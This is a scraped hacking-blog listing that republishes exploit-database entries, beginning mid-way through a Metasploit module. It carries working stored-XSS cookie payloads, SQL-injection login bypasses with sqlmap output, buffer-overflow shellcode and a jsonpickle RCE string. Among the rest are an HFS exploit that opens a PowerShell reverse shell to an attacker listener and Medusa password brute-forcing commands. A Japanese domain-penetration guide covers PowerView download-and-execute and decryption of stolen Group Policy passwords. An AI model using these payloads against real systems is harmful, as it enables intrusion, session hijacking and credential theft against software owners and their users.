in @selectler @secme["configuration[#{@a[0]}]"] = "0" end for @a in @textarr @secme["configuration[#{@a[0]}]"] = "0" end print_good(@secme.to_s) res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"), 'cookie' => @cookie, 'vars_get' => { 'cmd' => 'modules', 'set' => datastore["MODULE"], 'module' => datastore["SETTING"], 'action' => 'save' }, 'vars_post' => @secme ) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"), 'vars_get' => { 'cmd' => 'modules', 'set' => datastore["MODULE"], 'module' => datastore["SETTING"], 'action' => 'edit' }, 'cookie' => @cookie ) end end end
  11. HireHackking

    Web Based Quiz System 1.0 - 'name' Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting # Date: 2021-03-02 # Exploit Author: P.Naveen Kumar # Vendor Homepage: https://www.sourcecodester.com # Software Download Link : https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html # Software : Web Based Quiz System # Version : 1.0 # Vulnerability Type : Cross-site Scripting # Vulnerability : Persistent/Stored XSS # Tested on: Windows 10 Pro # Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe # in registration form in name parameter affected from this vulnerability. # payload: <script>alert(document.cookie)</script> # HTTP POST request POST http://localhost:8080/quiz/register.php HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------283640616528311462411171270636 Content-Length: 690 Origin: http://localhost:8080 Connection: keep-alive Referer: http://localhost:8080/quiz/register.php Cookie: PHPSESSID=ptujqhbkupjsqjkqs7tjhnb5er Upgrade-Insecure-Requests: 1 -----------------------------283640616528311462411171270636 Content-Disposition: form-data; name="name" <script>alert(document.cookie)</script> -----------------------------283640616528311462411171270636 Content-Disposition: form-data; name="email" test123@gmail.com -----------------------------283640616528311462411171270636 Content-Disposition: form-data; name="password" Hacker -----------------------------283640616528311462411171270636 Content-Disposition: form-data; name="college" hello -----------------------------283640616528311462411171270636 Content-Disposition: form-data; name="submit" -----------------------------283640616528311462411171270636-- POC: # go to url http://localhost:8080/quiz/register.php # then you have to fill the above payload in name/username parameter # then fill the remaining details # then click submit # then login to user account # then attempt any one quiz after attempting go to ranking section then # you can see xss pop up there..!
  12. HireHackking

    Comment System 1.0 - 'multiple' Stored Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Comment System 1.0 - 'multiple' Stored Cross-Site Scripting # Date: 2021-02-18 # Exploit Author: Pintu Solanki # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14713/comment-system-phpmysqli-full-source-code.html # Software: : Comment System 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 # Vulnerable Page: http://localhost/comment/index.php # Vulnerable Input Field : Your Name: "><script>alert(document.cookie)</script> Comment: "><script>alert(document.cookie)</script> # Payload used: "><script>alert(document.cookie)</script> # POC: Whenever we will go to the page (http://localhost/comment/index.php) where the script is injected, the stored script will be executed. # You will see your Javascript code (XSS) executed.
  13. HireHackking

    Title: Medusa Beginner Guide My sister-in-law will use it

    HireHackking posted a blog entry in Hacker Technology
    Medusa is a fast, large-scale parallel, modular explosive cracking tool. Strong tests can be performed on multiple hosts, users, or passwords at the same time. Medusa, like hydra, is also an online password cracking tool. Medusa is a password blasting tool that supports AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare), NNTP, PcAnywhere, POP3, PostgreSQL, rexec, RDP, rlogin, rsh, SMBNT, SMTP(AUTH/VRFY), SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC, Generic Wrapper and Web forms. Grammar mudusa -h Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT] command detailed explanation: -h: Destination host IP -H: file (when there are multiple targets, you can put the IP into one file) -u: Single username -U: User Name Dictionary File -p: Single password -P: Password file -M: Module Password cracking for specified username If the username and protocol are both known, we can use medusa to crack the password. The command is as follows: medusa -h 192.168.50.1 -u priess -P /root/zi.txt -M ssh Account and password cracking The user name and password are unknown, the command is as follows medusa -h 192.168.50.1 -U user.txt -P pass.txt -M ssh Here, we use the -U option as the username file, the -P option for the password file, and the -h option for the hostname. Display module usage information You can use the new option -q, which will display the usage information of the module. This should be used in conjunction with the -M option. medusa -h 192.168.50.1 -U user.txt -P pass.txt -M ssh -q Successfully stopped When using the above command, the attack will continue despite the correct username and password, which can take a long time when the username and password list is long. Therefore, as an example, we only need to add the parameter -f medusa -h 192.168.50.1 -U user.txt -P pass.txt -M ssh -f
  14. HireHackking

    Online Exam System With Timer 1.0 - 'email' SQL injection Auth Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Exam System With Timer 1.0 - 'email' SQL injection Auth Bypass # Date: 2021-02-18 # Exploit Author: Suresh Kumar # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/13877/online-exam-timer.html # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 # This application is vulnerable to SQL injection vulnerability. # Vulnerable Page: http://localhost/CEE/adminpanel/admin/index.php # Payload used: Email => ' or 'x'='x Password => ' or 'x'='x # POC: Whenever we will go to the page (http://localhost/CEE/adminpanel/admin/index.php) when we inject SQL Payload then we will directly enter into the Admin Panel page.
  15. HireHackking

    dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC) # Exploit Author: Kağan Çapar # Date: 2020-02-17 # Vendor Homepage: https://www.ddc-web.com/ # Software Link: https://www.ddc-web.com/en/connectivity/databus/milstd1553-1/software-1/bu-69414?partNumber=BU-69414 # Version: 4.5.3 # Tested On: Windows 10 Enterprise (x64) # about Sofware: # dataSIMS, an all-in-one Avionics Bus Analysis & Simulation Software Tool, provides an easy-to-use graphical interface, simplifying any MIL-STD-1553 or ARINC 429 testing effort. # about ARINC 664-1: # ARINC 664 is a multipart specification that defines an Ethernet data network for aircraft installations. # Part 7 of ARINC 664 defines a deterministic network, also known as Avionics Full Duplex Switched Ethernet (or AFDX®). #!/usr/bin/env python # -*- coding: UTF-8 -*- import struct import binascii import os import sys #EAX : 00000000 #EBX : 00000000 #ECX : 42424242 #EDX : 77B96330 ntdll.77B96330 #EBP : 000A1328 #ESP : 000A1308 #ESI : 00000000 #EDI : 00000000 #EIP : 42424242 #EFLAGS : 00010246 #LastError : 00000000 (ERROR_SUCCESS) #LastStatus : C0000034 (STATUS_OBJECT_NAME_NOT_FOUND) #Last chance expection on 42424242 (C0000005, EXPECTION_ACCESS_VIOLATION)! file = open("milstd1553result.txt", "w") junk = "\x41" * 600 align = "\x32" * 4 + "\x31" * 4 prop = "\x43" * 380 imp = "\x62\x7a\x68\x72\x74\x75\x72\x6c\x75\x32" imp2 = "\x61\x72\x61\x63\x61\x67\x131\x7a" #EIP Overwrite junk value overwrite = "\x42" * 4 #Payload size: 29 bytes #Final size of py file: 160 bytes #msfvenom -p generic/tight_loop --platform windows_86 -f py -e x86/shikata_ga_nai buf = b"" buf += b"\xda\xc1\xd9\x74\x24\xf4\x58\xbb\x0b\x7e\x97\x62\x33" buf += b"\xc9\xb1\x01\x31\x58\x19\x83\xe8\xfc\x03\x58\x15\xe9" buf += b"\x8b\x7c\x9c" win32 = junk + align + prop + imp + imp2 + overwrite + buf print len(win32) file.write(win32) file.close()
  16. HireHackking

    Beauty Parlour Management System 1.0 - 'sername' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Beauty Parlour Management System 1.0 - 'sername' SQL Injection # Date: 19/2/2021 # Exploit Author: Thinkland Security Team # Vendor Homepage: https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/wp-content/uploads/2019/08/Beauty-Parlour-Management-System.zip # Version: V 1.0 # Tested on: Windows、XAMPP # Identify the vulnerability 1. go to http://localhost/bpms/admin/ and login with your account 2. then go to http://localhost/bpms/admin/edit-services.php?editid=17 3. Save the packet data as 3.txt POST /bpms/admin/edit-services.php?editid=17 HTTP/1.1 Host: http://localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 71 Origin: http://localhost Connection: close Referer: http://localhost/bpms/admin/edit-services.php?editid=17 Cookie: PHPSESSID=qaqv7jl8dqci4i2nldnj4n60s0 Upgrade-Insecure-Requests: 1 sername=%3Cimg+src%3D1+onerror%3Dalert%28%2Fxss%2F%29%3E&cost=1&submit= # Exploit Now you can exploit it using sqlmap command: sqlmap -r file --batch --dbms=mysql --current-db example: sqlmap.py -r 3.txt --batch --dbms=mysql --current-db &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; __H__ &nbsp;___ ___[.]_____ ___ ___&nbsp; {1.4.10.16#dev} |_ -| . [.]&nbsp;&nbsp;&nbsp;&nbsp; | .'| . | |___|_&nbsp; [)]_|_|_|__,|&nbsp; _| &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; |_|V...&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; |_|&nbsp;&nbsp; http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 09:30:14 /2021-02-19/ [09:30:14] [INFO] parsing HTTP request from '3.txt' it appears that provided value for POST parameter 'sername' has boundaries. Do you want to inject inside? ('<img src%3D1 onerror%3Dalert(/xss*/)>') [y/N] N [09:30:14] [WARNING] provided value for parameter 'submit' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly [09:30:14] [INFO] testing connection to the target URL [09:30:15] [INFO] testing if the target URL content is stable [09:30:15] [INFO] target URL content is stable [09:30:15] [INFO] testing if POST parameter 'sername' is dynamic [09:30:15] [WARNING] POST parameter 'sername' does not appear to be dynamic [09:30:15] [WARNING] heuristic (basic) test shows that POST parameter 'sername' might not be injectable [09:30:15] [INFO] testing for SQL injection on POST parameter 'sername' [09:30:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [09:30:15] [WARNING] reflective value(s) found and filtering out [09:30:16] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [09:30:16] [INFO] testing 'Generic inline queries' [09:30:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [09:30:16] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' [09:30:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [09:30:16] [WARNING] time-based comparison requires larger statistical model, please wait........ (done) [09:30:26] [INFO] POST parameter 'sername' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y [09:30:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [09:30:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [09:30:27] [INFO] checking if the injection point on POST parameter 'sername' is a false positive POST parameter 'sername' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests: --- Parameter: sername (POST) &nbsp;&nbsp;&nbsp; Type: time-based blind &nbsp;&nbsp;&nbsp; Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) &nbsp;&nbsp;&nbsp; Payload: sername=<img src=1 onerror=alert(/xss/)>' AND (SELECT 3311 FROM (SELECT(SLEEP(5)))YaHW) AND 'HGFO'='HGFO&cost=1&submit= --- [09:30:42] [INFO] the back-end DBMS is MySQL [09:30:42] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [09:30:47] [INFO] fetching current database [09:30:47] [INFO] retrieved: [09:30:57] [INFO] adjusting time delay to 1 second due to good response times bpmsdb current database: 'bpmsdb' [09:31:15] [INFO] fetched data logged to text files under
  17. HireHackking

    OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting # Date: 19/02/2021 # Exploit Author: Kamil Breński # Vendor Homepage: https://www.opentext.com/ # Software Link: https://www.opentext.com/products-and-solutions/products/enterprise-content-management/content-management # Version: 20.3 ========================================================================================== 1.) Document version XSS ========================================================================================== A user with permissions to create new document versions could create a malicious stored cross-site scripting payload. The description value would be reflected by the server without proper sanitization resulting in a stored XSS vulnerability. ------------------------------------------------------------------------------------------ POST /otcs/cs.exe HTTP/1.1 Host: redacted User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=--------------------------20043647051137266192675354452 Content-Length: 2071 Origin: https://redacted Connection: close [snipped] -----------------------------20043647051137266192675354452 Content-Disposition: form-data; name="func" doc.addversion2 -----------------------------20043647051137266192675354452 Content-Disposition: form-data; name="nodeID" 1125007 [snipped] -----------------------------20043647051137266192675354452 Content-Disposition: form-data; name="comment" <svg/onload=alert()> -----------------------------20043647051137266192675354452 [snipped] ------------------------------------------------------------------------------------------ Next a user which visits the version site will execute the malicious javascript. An example URL will look like the following: ------------------------------------------------------------------------------------------ https://redacted/otcs/cs.exe?func=ll&objId=1125007&objAction=versions&nexturl=%2Fotcs%2Fcs%2Eexe%3Ffunc%3Dll%26objid%3D1121694%26objAction%3Dbrowse%26sort%3Dname ------------------------------------------------------------------------------------------ ========================================================================================== 2.) Project Banner XSS ========================================================================================== A project banner could be crafter in such a way that clicking it would result in the execution of user defined javascript. The application did not validate the scheme used by the user supplied URL and it could be set to "javascript://". The request which saved the payload on the server look like the following: ------------------------------------------------------------------------------------------ POST /otcs/cs.exe HTTP/1.1 Host: redacted User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 479 Origin: redacted Connection: close[snipped] func=ll&objAction=ConfigLookFeel&objId=1120281&currenttab=2&tab=1&roleid=0&newroleid=0&IMG1_ID=1129727&IMG1_PathSaved=STM.K.Brenski%40redacted+Home%3Aimgx.svg&IMG1_Path=STM.K.Brenski%40redacted+Home%3Aimgx.svg&IMG1_ALT=THISBANNERWILLEXECUTEJAVASCRIPT&IMG1_URL=JaVaScRiPt%3Aalert%28%27XSS%27%29&IMG2_ID=1129727&IMG2_PathSaved=STM.K.Brenski%40redacted+Home%3Aimgx.svg&IMG2_Path=STM.K.Brenski%40redacted+Home%3Aimgx.svg&IMG2_ALT=THISONETOO&IMG2_URL=JaVaScRiPt%3Aalert%28%27XSS%27%29 ------------------------------------------------------------------------------------------ Next a user would have to browse to the project page and click on the project banner. ==========================================================================================
  18. HireHackking

    Monica 2.19.1 - 'last_name' Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Monica 2.19.1 - 'last_name' Stored XSS # Date: 22-02-2021 # Exploit Author: BouSalman # Vendor Homepage: https://www.monicahq.com/ # Software Link: https://github.com/monicahq/monica/releases # Version: Monica 2.19.1 # Tested on: Ubuntu 18.04 # CVE : CVE-2021-27370 POST /people HTTP/1.1 Host: 192.168.99.162 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 199 Origin: http://192.168.99.162 Connection: close Referer: http://192.168.99.162/people/add Cookie: remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IjZBQ21CelczS1ZxS1dmMkNxWFBqN1E9PSIsInZhbHVlIjoiME01aDNSS2FHQ1lZdS9KSVlSL1pKdC9qcHRWRDVveWFvb0ZkUFB4cFlaSDhEclB3SG9UQ3BISzVoWFdYQUYrVkdpUVNkRUNlbUxFOTEyOC9Vb1ZaWFZTblpGOWlRVW9PR0FmSVhyL3JwUmgweU9hODlJWU5vNmQ3aDcrT084MjBoQU5Ednh0TWJ6dmxwS2NadFovMEdveko1V0RvbThXT2Jram1JVW5LcXdqUzl4alVBRDFBYXNjSEt3amRxbVFvQ3pMMGJZU2owWTZzWVp1ZURTNUtoRUlJMnVrV3NiVHRNRTU5YysvLzl2Zz0iLCJtYWMiOiI5MTc2NDAwZTY4NjVmZDg3NjM1YjY3NDRiMzFhMmRiYzIwMjFhODU4YWQyOWUwZmQzOTBlY2Y1ZTI0ODdiNzVkIn0%3D; laravel_token=eyJpdiI6InIwQ2RlQW9FRG5lanlOZmlXWXBRVEE9PSIsInZhbHVlIjoiUHhPNmZneXUydGVCZHlVMEI5cHpiTWI2OE5qajN5UVJXUmJHSFV1VGgya2NEbEJ6T3N0QVhKeUZwU0R4a05HWTgwNTNidTk4aGNXc3UzejY4WDJnaUJ0VUp1ekQ5cjVDc0hLSWpGTzc1ZWRRQ05Yem0vK3RZdEpOVHNQeE4rQ1orbXNJTXhWczJnMENYeGp6Q3NnOGU5TXhpZDd1bS9wRlBZS0xsYmpLSXJiMHhSVmU2NnBUMjdYS1RTQmJrNkU4cWNtZGJVdjFpaXp5a2YzdVZsWWxQMjBicDQxUGFjZlhGbmhCOHl2MkVXdzRoalNtbE9xL010clpZMGJNVmVQNWUzQlpsRFVKamlWQ2Jydk9sZWg3cHNKWVIvRW92alp0YURJcllXa08rTjA4Y2lvVzNHTXBrem11Q21xaW92cEwiLCJtYWMiOiI1YjM5NzViODhjNTk5MWUzNWFjZDg0ZWZmNjk1NjE3MzhhN2M0NGFjNWE3MzMyMGFhNTI2ZjgxMjE4OTRjZDg4In0%3D; XSRF-TOKEN=eyJpdiI6IkZFY1FLVEJFRXJMOWh6Vll1SW51akE9PSIsInZhbHVlIjoiRTVLRFZnOEovNk9XeFB2bXFQZnFlM0FxRU9QMVRxaHRhS3RzOHNpWm45K0xXV1FsbWhzV0RxUWd6bStxVXFBTHF1WlkrSklnSXoxbkFXK1JNcURhUHp6eTFOUHdLclFkTTEvUFhtTDgzVHA2RElFNnVuOWVyRGxCSGJmdzhJOXciLCJtYWMiOiIxOWNlMjkxMjM5ZTlmMDFiZjhiM2VlZjZjZmNmMmFmZDA4MzcyZjc3Yzg2MmQ2MWIwNTY2OTZlNjQyZDkzMjA0In0%3D; laravel_session=eyJpdiI6InBtUThtUFE1RzdvbW40ay8wdWJraXc9PSIsInZhbHVlIjoiS1hoVlJoNzFrYlpBUGRTL2V0YzVDRlR6dHl6NE12NjFxVTEvbXQwYTJnRUwyY3VQc2hOeWlkbUdyeEx5aDBnYlJER1BnbW52RXR0QWs1ZG00eWg0U2JNb3dIRTQ0aU9HK0JnTzE5eXQwUGlzbDNsbVFVa3RabWVQVzF4OXJsUTMiLCJtYWMiOiI3YmQwZDFkYjAwMzdlZTllODAzYjZmNzQ2YWI5NTMzMDY0ZWIzMWIyOWI4MjM4ODMzMDdhNjc2YTE4ZDViZDg0In0%3D Upgrade-Insecure-Requests: 1 _token=afJRD6VqgCxIze3tGcCqzyeb3YaFka3fvjqV9YOx&first_name=XSS+POC&middle_name=&last_name=%7B%7B+constructor.constructor%28%22alert%28document.cookie%29%22%29%28%29+%7D%7D&nickname=&gender=&save=true
  19. HireHackking

    HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3) # Google Dork: intext:"httpfileserver 2.3" # Date: 20/02/2021 # Exploit Author: Pergyz # Vendor Homepage: http://www.rejetto.com/hfs/ # Software Link: https://sourceforge.net/projects/hfs/ # Version: 2.3.x # Tested on: Microsoft Windows Server 2012 R2 Standard # CVE : CVE-2014-6287 # Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands #!/usr/bin/python3 import base64 import os import urllib.request import urllib.parse lhost = "10.10.10.1" lport = 1111 rhost = "10.10.10.8" rport = 80 # Define the command to be written to a file command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport}); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{{0}}; while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){{; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback = (Invoke-Expression $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (Get-Location).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}}; $client.Close()' # Encode the command in base64 format encoded_command = base64.b64encode(command.encode("utf-16le")).decode() print("\nEncoded the command in base64 format...") # Define the payload to be included in the URL payload = f'exec|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand {encoded_command}' # Encode the payload and send a HTTP GET request encoded_payload = urllib.parse.quote_plus(payload) url = f'http://{rhost}:{rport}/?search=%00{{.{encoded_payload}.}}' urllib.request.urlopen(url) print("\nEncoded the payload and sent a HTTP GET request to the target...") # Print some information print("\nPrinting some information for debugging...") print("lhost: ", lhost) print("lport: ", lport) print("rhost: ", rhost) print("rport: ", rport) print("payload: ", payload) # Listen for connections print("\nListening for connection...") os.system(f'nc -nlvp {lport}')
  20. HireHackking

    Batflat CMS 1.3.6 - 'multiple' Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Batflat CMS 1.3.6 - 'multiple' Stored XSS # Date: 22/02/2021 # Exploit Author: Tadjmen # Vendor Homepage: https://batflat.org/ # Software Link: https://github.com/sruupl/batflat/archive/master.zip # Version: 1.3.6 # Tested on: Xammpp on Windows, Firefox Newest # CVE : N/A Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6 Login with editor account with rights to Navigation, Galleries, Snippets Navigation - Add link payload: "><img src=x onerror=alert(document.cookie)> Galleries - Add gallery payload: mlem"><svg/onload=alert(1)> Snippets - Add Snippets payload: mlem"><svg/onload=alert("TuongNC")> More information: https://github.com/sruupl/batflat/issues/105
  21. HireHackking

    LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path # Discovery by: Victor Mondragón # Discovery Date: 23-02-2021 # Vendor Homepage: https://www.softros.com/ # Software Links : https://download.logonexpert.com/LogonExpertSetup64.msi # Tested Version: 8.1 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 7 Service Pack 1 x64 # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ LogonExpert Service LogonExpertSvc C:\Program Files\Softros Systems\LogonExpert\LogonExpertService.exe Auto C:\>sc qc LogonExpertSvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: LogonExpertSvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Softros Systems\LogonExpert\LogonExpertService.exe LOAD_ORDER_GROUP : LogonExpertGroup TAG : 0 DISPLAY_NAME : LogonExpert Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem
  22. HireHackking

    python jsonpickle 2.0.0 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: python jsonpickle 2.0.0 - Remote Code Execution # Date: 24-2-2021 # Vendor Homepage: https://jsonpickle.github.io # Exploit Author: Adi Malyanker, Shay Reuven # Software Link: https://github.com/jsonpickle/jsonpickle # Version: 2.0.0 # Tested on: windows, linux # Python is an open source language. jsonickle module is provided to convert objects into a serialized form, # and later recover the data back into an object. the decode is used to undeserialize serialized strings. # If malicious data is deserialized, it will execute arbitrary Python commands. It is also possible to make system() calls. # the problem is in the inner function loadrepr function which eval each serialized string which contains "py/repr". # The vulnerability exists from the first version till the current version for backward compatibility. no patch is provided yet # the payload was found during our research made on deserialization functions. # the pattern should be : # {..{"py/repr":<the module to import>/<the command to be executed.>}..} # example: malicious = '{"1": {"py/repr": "time/time.sleep(10)"}, "2": {"py/id": 67}}' # the command on the server side some_parameter = jsonpickle.decode(malicious)
  23. HireHackking

    タイトル:イントラネットの浸透に関する知識の概要(転送)

    HireHackking posted a blog entry in Hacker Technology
    情報収集 オンラインの事前情報やその他の記事から収集されたさまざまな記事は投稿しません。 一般的に、どのドメインコントロールユニットであるかを知りたい場合は、イントラネットのDNSを知ることができます。一般に、ドメイン制御ユニットに複数のDNSがインストールされています。第二に、オープンポート389マシンをスキャンして取得するか、nltestコマンドを使用して表示できます。最後に、ドメイン制御がどのホストであるかを表示するさまざまなネットビュー nltest /dclist:pentest.com ここでは、PowertoolsのPowerView情報コレクションを使用しています。実際、多くの関数はネットコマンドです。ここでは、PowerShellに実装されています。 Powershell.exe -nop -noni -exec bypass 'iex(new.objectnet.webclient).downloadstring(' https://raw.githubusercontent.com/cheetz/powertools/master/powerview/powerview.ps1 '); get -hostip' より詳細な参照:ドメイン浸透情報コレクションPowertools get -netdomain-現在のユーザーのドメインの名前を取得します get -netforest-現在のユーザーのドメインに関連付けられた森林を取得します get -netforestdomains-現在の森林のすべてのドメインを取得します get -netdomaincontrollers-現在のコンピューターのドメインのドメインコントローラーを取得します get -netcurrentuser-現在の[domain \] usernameを取得します get -netuser-すべてのユーザーオブジェクトを返し、または指定されたユーザー(ワイルドカード固有)を返します get -netuserspns-すべてのユーザーServicePrincipalNamesを取得します get -netous-ドメイン組織ユニットのデータを取得します get -guidous-特定のGUIDにリンクされたドメインを見つける Invoke -NetuserAdd-ローカルまたはドメインユーザーを追加します get -netgroups-ドメイン内のすべての現在のグループのリストを取得します get -netgroup-指定されたドメイングループで各ユーザーのデータを取得します get -netlocalgroups-リモートホストまたはホストにローカルグループのリストを取得します get -netlocalgroup-リモートホストまたはホストにローカルグループのメンバーを取得します get -netlocalservices-リモートホストまたはホストの実行ランニングサービス/パスのリストを取得します Invoke -NetGroupUserAdd-指定されたローカルまたはドメイングループにユーザーを追加します Get -NetComputers-ドメイン内のすべての現在のサーバーのリストを取得します Get -NetFileservers-現在のドメインユーザーが使用するファイルサーバーのリストを取得します get -netshare-指定されたサーバーの共有情報を取得します Get -NetLogGedon-指定されたサーバーに積極的にログインしてユーザーを取得します Get -Netsesions-指定されたサーバーでアクティブなセッションを取得します Get-NetFilesessions-Get-NetsionsとGet-NetFilesの組み合わせを返します get -netConnections-特定のサーバーリソースへのアクティブな接続を取得(共有) get -netfiles-サーバー上で開いたファイルを取得します get -netprocesses-リモートサーバーでリモートプロセスと所有者を取得します ドメインメソッドを取得 sysvol sysvolは、ドメイン内のすべてのドメインコントローラー間でコピーされるドメインパブリックファイルサーバーのコピーを保存する共有フォルダーを指します。 Sysvolフォルダーは、ADのインストール時に作成され、GPO、スクリプト、その他の情報を保存するために使用されます。同時に、Sysvolファイルフォルダーに保存されている情報は、ドメイン内のすべてのDCにコピーされます。 グループポリシーの設定を使用してグループポリシーを構成してユーザーローカル管理者パスワードを変更する 開始- 管理ツール - グループポリシー管理- このドメインでGPOを作成する 設定- 右クリック - 編集- ユーザー構成- 設定- コントロールパネル設定- ローカルユーザーとグループ 管理者のパスワードを更新します: ドメインサーバーは通常、このフォルダーを共有するか、現在のマシンの下でXMLファイルを検索するには、groups.xml、scheduledtasks.xml、services.xml、dataSources.xmlの資格情報が含まれます。 マッピングドライバー(drives.xml) DataSources.xml) プリンター構成(printers.xml) サービスを作成/更新する(services.xml) スケジュールされたタスク(ScheduleDtasks.xml) 認証されたユーザー(信頼できるドメインのドメインユーザーまたはユーザー)がSYSVOLに許可を読み取ったため \ 192.168.50.205Sysvolpentest.comPolicies {84017B64-2662-4BA3-A06C-FB953CCBE92D} userPreferencesGroups.xml AES-256ビットで暗号化されています cpassword='fucmhaw9i2pdyrzebms54ivtphx3ni44qrkwtfbtxoa' AES秘密キーを使用してGPPパスワードを復号化できます Microsoftは、MSDNでAES暗号化キー(共有キー)をリリースします https://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx PowerShellのスクリプトを使用した復号化 https://github.com/powershellmafia/powersploit/blob/master/exfiltration/get-gpppassword.ps1 